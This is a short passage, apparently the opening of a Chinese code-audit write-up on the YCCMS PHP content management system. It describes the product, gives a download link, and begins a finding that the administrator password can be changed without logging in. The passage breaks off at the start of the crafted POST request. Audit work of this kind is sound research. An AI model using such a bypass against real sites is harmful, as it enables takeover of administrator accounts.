前言
这段时间的CMS代码审计,感谢各位师傅的分享,向师傅们致敬。
CMS简介
YCCMS是一款PHP版轻量级CMS建站系统。程序页面设计简洁,生成静态html,后台功能强大。利于优化、超强收录、超强排名。适合做关键词排名、淘宝客程序,是个人、企业建站的理想选择。
YCCMS采用PHP5+MYSQL做为技术基础进行开发,OOP(面向对象),MVC模块化开发,代码易维护,方便功能扩展和二次开发。更高效、更安全、更稳定。
下载地址
http://ahdx.down.chinaz.com/202003/yccms_v3.4.rar
代码审计
修改管理员账号密码(越权)
在未登录情况下,构造:
POST /admin/?a=